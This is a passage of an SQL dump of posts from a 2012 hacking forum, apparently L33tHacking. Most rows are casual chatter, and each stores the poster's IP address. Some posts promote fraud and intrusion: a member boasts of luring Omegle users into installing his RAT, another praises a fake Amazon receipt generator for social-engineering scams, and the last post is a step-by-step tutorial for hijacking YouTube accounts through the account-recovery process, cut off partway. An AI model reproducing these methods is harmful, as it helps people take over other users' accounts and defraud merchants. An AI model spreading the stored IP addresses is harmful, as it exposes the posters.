`disableeditedby`, `edittime2`) VALUES ('1231', '265', '1184', '3', 'RE: Apathy Demoted', '0', '67', 'HoverCatz', '1346143414', 'Seriously? PM eachother now lol', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '400f445f1ee6e47bb0e7125a4e862abc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1232', '191', '666', '15', 'RE: ProDos v1.0', '0', '67', 'HoverCatz', '1346160405', '@sirchamp Yes its made in Gamemaker. Its the exactly same gui as when u Build and run the game. Even the Loading box is the same. Dont lie to me. I know what im talking about', '178.74.56.137', '-1303758711', '1', '0', '67', '1346160604', '1', '5981d4947bec227debe1cd5ae9a1de60', '0', '1346160604'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1233', '270', '1228', '7', 'RE: Hi everyone', '0', '82', 'iTzIpod', '1346160715', '[quote=\'NXK\' pid=\'1228\' dateline=\'1346136280\'] I haven\'t really been active due to college, I\'m just starting so iv had alot of paper work n things iv needed to do. So iv been busy. I\'ll try to remain HQ and release more programs/tuts soon. Yes this is me saying sorry at 2:35 am. Get over it. [/quote] Good luck in college dude. Don\'t worry, there is a reason why there are 2 Mods. Hope you can visit in the future. Also, I got school myself aswell. In 7 days to be exact..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b4ca57f842cc30873a20ddcd4b53bf65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1234', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346161013', 'It is official guys... I won', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7c9643ac545b44a82b537b3d400d4d3d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1235', '238', '1224', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346161418', '[quote=\'Baws\' pid=\'1224\' dateline=\'1346130192\'] [quote=\'iTzIpod\' pid=\'1221\' dateline=\'1346129404\'] [quote=\'Baws\' pid=\'1214\' dateline=\'1346127219\'] [quote=\'iTzIpod\' pid=\'1157\' dateline=\'1346096690\'] [quote=\'Apathy\' pid=\'1149\' dateline=\'1346095802\'] Banned for me not noticin that. So fuck you :) [/quote] Dude what\'s with the words? -.- Banned for swearing and spamming thread + breaking rules. (Only post in threads 3 times a day) [/quote] Banned for having so many awards, and being a noob. [/quote] Banned for calling me a noob. (How am I a noob)? [/quote] Banned for having a bigger dick than me. :/ [/quote] Uh. Alrighty then.Banned for having a smaller dick than me..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7d589c842342f3478bd409da5cfc64d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1236', '212', '1210', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1346162969', '[quote=\'Baws\' pid=\'1210\' dateline=\'1346126821\'] I see good group suggestions, good luck everyone. [/quote] Thanks Baws. If you need a group, let me know. You meet the requirements for mine. Just that I am waiting for it to be Official. If it ever is.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '77951ec4d43db8866d42ff897849aefd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1237', '271', '1230', '53', 'RE: Minecraft/Rsps coding', '0', '82', 'iTzIpod', '1346163123', 'My friend owns a RSPS called Deznation. You can check it out at DezNation.ca he might need some help coding stuff. I will inform him =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e6d12fe648b366cef8e67eba82d30380', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1238', '262', '1171', '43', 'RE: Amazon Receipt Generator V.2', '0', '82', 'iTzIpod', '1346163204', 'I had this. But then when I got the receipt, I had to photoshop the copyright thing because it said 1996-2010 instead of 2012. [hr] OT: Nice release. It will make SEing more easier and faster hopefully.', '24.212.197.164', '416597412', '1', '0', '82', '1346163244', '1', 'f6fc2f472c51e653fd345557bf793c6f', '0', '1346163244'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1239', '269', '1229', '3', 'RE: Group Image not working', '0', '82', 'iTzIpod', '1346163291', '[quote=\'Baws\' pid=\'1229\' dateline=\'1346141059\'] Alright I\'m glad I pointed this out. :) [/quote] I just want to see the Super Moderator Userbar.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5ab219ad5e9fec2486d4388ff4c3c5c3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1240', '269', '1212', '3', 'RE: Group Image not working', '0', '1', 't3h jok3r', '1346164105', 'Whoops. Thanks for letting me know, last night I was having a cache problem so couldn\'t see the changes when they were updated. Thanks for reporting.', '41.151.157.76', '697802060', '1', '0', '0', '0', '1', 'ce69131379b910d22cb358793471f0ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1241', '199', '714', '25', 'RE: [Guide]How to protect your identity[Well-detailed]', '0', '1', 't3h jok3r', '1346164548', 'This is a really good guide on protecting your identity online.', '41.151.157.76', '697802060', '1', '0', '0', '0', '1', '2c156b6ad334100ab2fa4dcbc8087dac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1242', '268', '1201', '49', 'RE: [Suggestion] Forum News Section', '0', '1', 't3h jok3r', '1346165372', '[quote=\'Apathy\' pid=\'1201\' dateline=\'1346122894\'] Why would this be needed as there is like 5 active people? [/quote] 129 Registered Users [b]17 Active Users[/b] 4 Registrations Today 2 Awaiting Activation Seems like you never logged into the ACP.', '41.151.157.76', '697802060', '1', '0', '0', '0', '1', 'ff56f265e1c493fa33017658de2e4a88', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1243', '272', '0', '4', 'Hello, I\'m Dreamer', '0', '138', 'Dreamer', '1346169102', '[align=center][b]Hello, LH I\'m Dreamer. If you\'re or were into the Xbox Live modding world, you would know me as DarkDreamer. Well, I\'ve retired with that and I\'m on to new and better things. Even when I was doing my thing on the xbox, I was still practicing SE and Human Manipulation. I would practice it on Omegle to get victims for my RAT. Well, I\'ve only gotten better at it. This is about my 3rd year doing so, and I\'m glad to be a part of a community that\'s almost completely based on it. I hope to do well here. If anyone has any questions or needs help, feel free to shoot me a PM.[/b][/align]', '71.207.111.91', '1204776795', '0', '0', '0', '0', '1', 'f8e61a287e8012b75ff48703f13bb011', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1244', '232', '949', '50', 'RE: Triple H', '0', '20', 'JakeUS', '1346169647', 'Closing thread.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '966b5018285448322ce35b30a558ddd5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1245', '272', '1243', '4', 'RE: Hello, I\'m Dreamer', '0', '82', 'iTzIpod', '1346169725', 'Hello Dreamer. Welcome to L33tHacking. Once a L33t, Always a L33t. I\'m glad you joined. Please be active and stick to the rules. Thanks for joining L33thacking.com', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a8a4e4782ebfd3946620bdd2646dd354', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1246', '190', '665', '56', 'RE: Copy and paste game', '0', '67', 'HoverCatz', '1346169833', 'Play IW4M (Modern Warfare 2)', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '6e96f0581dd3f808c1a3e082d71a062f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1247', '271', '1230', '53', 'RE: Minecraft/Rsps coding', '0', '67', 'HoverCatz', '1346170143', 'Tried to connect with the client, it wont connect to the server. Cant login at all', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'e83b3a735a9e2f8ed90695f2da9ca86b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1248', '199', '714', '25', 'RE: [Guide]How to protect your identity[Well-detailed]', '0', '67', 'HoverCatz', '1346170841', 'Nice :) But its Copy pasted.', '178.74.56.137', '-1303758711', '1', '0', '67', '1346171034', '1', '4b6b854821ed605e8b622218d56f3253', '0', '1346171034'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1249', '273', '0', '59', '????Free Spreading Complete Ebook????', '0', '138', 'Dreamer', '1346171506', '[align=center][b]Okay, I\'m going to make this short and to the point. If you would like the method, just comment on here. This is for all members. I know a lot of people have posted these, but why not one more right? Enjoy, guys![/b][/align]', '71.207.111.91', '1204776795', '1', '0', '0', '0', '1', '9c82ab4e6f4f3a0d4500bec2f9b16925', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1250', '273', '1249', '59', 'RE: ????Free Spreading Complete Ebook????', '0', '67', 'HoverCatz', '1346171686', 'May i have this? Thanks in advance :3 Edit: Oh, btw l33thacking is kinda meant to be without any \"comment or Pm to get link\" :P', '178.74.56.137', '-1303758711', '1', '0', '67', '1346171733', '1', '43e966b295c2b57e26754f8070aee555', '0', '1346171733'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1251', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1346175402', '[color=transparent]l33thacking.com[/color] to this message here.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c92151a196a8175feac99dd623fcfb50', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1252', '248', '1056', '16', 'RE: [Free] [EBook] How to SE a 3DS', '0', '116', '@SSASIN', '1346176198', 'Going to be trying this as we speak. Hope i can SE dem', '2.98.231.234', '40036330', '0', '0', '0', '0', '1', 'e2a0f2706a984aa56558ccca32016edf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1253', '191', '666', '15', 'RE: ProDos v1.0', '0', '53', 'sirchamp', '1346179556', 'You can make the exact same gui with c++. Can you code in c++?I dont think so..', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '94fd0903e31c2bb69a4afd5590b14577', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1254', '190', '665', '56', 'RE: Copy and paste game', '0', '55', 'Baws', '1346181317', 'That\'s not fair :o Copied: Roflcopter', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'f0193bb8f186b8ec2c8f311c99aa5339', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1255', '199', '1248', '25', 'RE: [Guide]How to protect your identity[Well-detailed]', '0', '55', 'Baws', '1346181456', '[quote=\'HoverCatz\' pid=\'1248\' dateline=\'1346170841\'] Nice :) But its Copy pasted. [/quote] Nice but I think HoverCatz is right. :P', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '82a21567d1928fe22c63eff179af7f5e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1256', '272', '1243', '4', 'RE: Hello, I\'m Dreamer', '0', '55', 'Baws', '1346181523', 'Welcome here, you seem pretty badass!', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '903aedbed1301e3de7eef9ba53257682', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1257', '238', '1235', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346181604', '[quote=\'iTzIpod\' pid=\'1235\' dateline=\'1346161418\'] [quote=\'Baws\' pid=\'1224\' dateline=\'1346130192\'] [quote=\'iTzIpod\' pid=\'1221\' dateline=\'1346129404\'] [quote=\'Baws\' pid=\'1214\' dateline=\'1346127219\'] [quote=\'iTzIpod\' pid=\'1157\' dateline=\'1346096690\'] Dude what\'s with the words? -.- Banned for swearing and spamming thread + breaking rules. (Only post in threads 3 times a day) [/quote] Banned for having so many awards, and being a noob. [/quote] Banned for calling me a noob. (How am I a noob)? [/quote] Banned for having a bigger dick than me. :/ [/quote] Uh. Alrighty then.Banned for having a smaller dick than me.. [/quote] Banned for having a small chat with you mom and she let you know I gotta smaller dick.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'd02f1a4458e973c0eb5ba74cc7230cfd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1258', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1346181769', '[Monday, August 27, 2012 2:00 PM]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0dd0e38522ecc8bce295dda67b5a511a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1259', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346181809', 'Banned for quoting me. Enjoy your ban! ^__^', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7102640f40cf8674b3cb259e896fe4cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1260', '238', '1259', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346182662', '[quote=\'iTzIpod\' pid=\'1259\' dateline=\'1346181809\'] Banned for quoting me. Enjoy your ban! ^__^ [/quote] Banned for not quoting me. Enjoy your ban! ^__^', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '87a3317e324ea85cdc78476848b89e50', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1261', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346183038', 'Banned for being Elite.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '99fac0e032a0906cb96753f537895af0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1262', '238', '1261', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346183503', '[quote=\'iTzIpod\' pid=\'1261\' dateline=\'1346183038\'] Banned for being Elite. [/quote] Banned for being LH Mod.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'b3f418e290e3d2c3feed7c2c1b453c8b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1263', '190', '665', '56', 'RE: Copy and paste game', '0', '55', 'Baws', '1346183549', 'l33thacking.com to this message here.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '770aace13186135fabe6baebecbca5ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1264', '235', '980', '48', 'RE: Experiences of MOD', '0', '61', 'NXK', '1346184038', 'It\'s good. I feel like I can actually do something for this community.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'b747d2be90e138016b4651e536505676', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1265', '272', '1243', '4', 'RE: Hello, I\'m Dreamer', '0', '1', 't3h jok3r', '1346187355', 'Welcome to L33THacking. Hope you enjoy your stay on LH.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', 'cac7565dc4fe4854fd3e5bf5f673b233', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1266', '273', '1249', '59', 'RE: ????Free Spreading Complete Ebook????', '0', '1', 't3h jok3r', '1346187509', 'LH is not a post here and PM me website like HF, but we DO allow post here only. It\'s just for the starting because we require activity and need to boost up our stats.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', '3f770499183a5176572f585ef0025434', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1267', '191', '666', '15', 'RE: ProDos v1.0', '0', '67', 'HoverCatz', '1346187584', 'You can make the exact same gui in Gamemaker. Dude, what is even the damn point making the Gamemaker gui in c++?.. (facepalm)', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '3422020364e06b6b54c83ea946513ae6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1268', '235', '980', '48', 'RE: Experiences of MOD', '0', '1', 't3h jok3r', '1346187759', 'I feel jealous, because your guys username & star color and Userbar match and look beast.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', '0d736184dff0062908606c40da25491f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1269', '255', '1121', '5', 'RE: IMPORTANT!!!', '0', '1', 't3h jok3r', '1346187821', 'Does anyone care?', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', '543df26c542ddce0201a32024a27a259', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1270', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1346188839', 'http://l33thacking.com/index.php I sent a PM to someone on another forum advertising LH.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', 'ffd73b6babe047071ff3c8a68c7cb885', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1271', '235', '1268', '48', 'RE: Experiences of MOD', '0', '61', 'NXK', '1346188889', '[quote=\'t3h jok3r\' pid=\'1268\' dateline=\'1346187759\'] I feel jealous, because your guys username & star color and Userbar match and look beast. [/quote] I think just having the title admin wins bro.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'e86832f330b0a36b05fc508ee872f178', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1272', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1346188896', 'Lmao Banned for having too many reasons to ban each other.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', 'c1ff7fe2b83c450f3f60060ce31a2986', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1273', '214', '856', '52', 'RE: [tut] Creating a IPod PID Generator', '0', '1', 't3h jok3r', '1346188983', 'Lol if he doesn\'t give credits then people neg rep him. If he does then we make fun of him lol.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', 'd22db029590e6550c0d1aa8c8e96bf1f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1274', '274', '0', '42', 'Another death in the family for Sylvester Stallone', '0', '1', 't3h jok3r', '1346189604', '[img]http://l.yimg.com/os/289/2012/08/28/300-Stallone3-082812-jpg_142757.jpg[/img] Six weeks after his 36-year-old son, Sage, died unexpectedly, the actor has lost his only sister. Toni Ann Filiti, the 48-year-old half-sister of “The Expendables 2” star, succumbed to lung cancer on Sunday. She died at their mother Jackie Stallone’s Santa Monica home after choosing to leave UCLA hospital. \"I was holding her in my arms,” Jackie, 90, told the New York Daily News. “I had just washed [her] face and told her how pretty she looked, and she just fell asleep. … She’s too young to go, but she wasn’t feeling any pain.”', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', '722e6aacf5639e94a16aeb399c0ade0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1275', '275', '0', '12', '[???]Hack Tons of YouTube Accounts. No Keylogging etc.[???]', '0', '5', 'Timmy', '1346189787', '[b] This is a Tutorial about YouTube Accounts Hacking ! This Tutorial is written by me and I got the Idea from a Member of HF. So let\'s Start ! [color=#FF0000]1.Step :[/color] Go to this Link --> https://encrypted.google.com/ [color=#FF0000]2.Step :[/color] Now on the click this : [spoiler] [URL=http://img839.imageshack.us/i/bild2cp.png/][IMG]http://img839.imageshack.us/img839/8743/bild2cp.png[/IMG][/URL] Uploaded with [URL=http://imageshack.us]ImageShack.us[/URL] [/spoiler] [color=#FF0000]3. Step : [/color] Now go to this : [spoiler] [URL=http://img204.imageshack.us/i/bild2jb.png/][IMG]http://img204.imageshack.us/img204/3572/bild2jb.th.png[/IMG][/URL] Uploaded with [URL=http://imageshack.us]ImageShack.us[/URL] [/spoiler] [color=#FF0000]4. Step:[/color] Now this is the a [color=#FF0000]very Important[/color] Part : You have to put in an Email like this : ******@malinator.com . Remeber that it haves to end with \"mailinator.com\" . So in the End it\'ll look like this : \"hello123@mailinator.com\" . You can of course chose a random name like : youtube, mouse, crystal, fuckandsuck etc. . [color=#FF0000]5. Step : [/color] It\'s very Easy : Type the Confirmation Code and click Next ! [color=#FF0000]6. Step : [/color] Now Make sure that the first one is Pointed ( something like : Email to ****@mailinator.com Then Press Next ! [color=#6B8E23]Ok Now the First Part is Done.[/color] [color=#1E90FF]The Second is to easy :[/color] [color=#FF0000]1. Step : [/color] Go to : www.Mailinator.com [color=#FF0000]2. Step : [/color] At the Left there is a Box where you should Type in the Email which u used to Recover in the Previous Steps. [color=#FF0000]3. Step : [/color] Log In [color=#FF0000]4. Step : [/color] Now you are in the Mailinator Account ( Email Account ) [color=#FF0000]5. Step : [/color] There should be an Email with Google 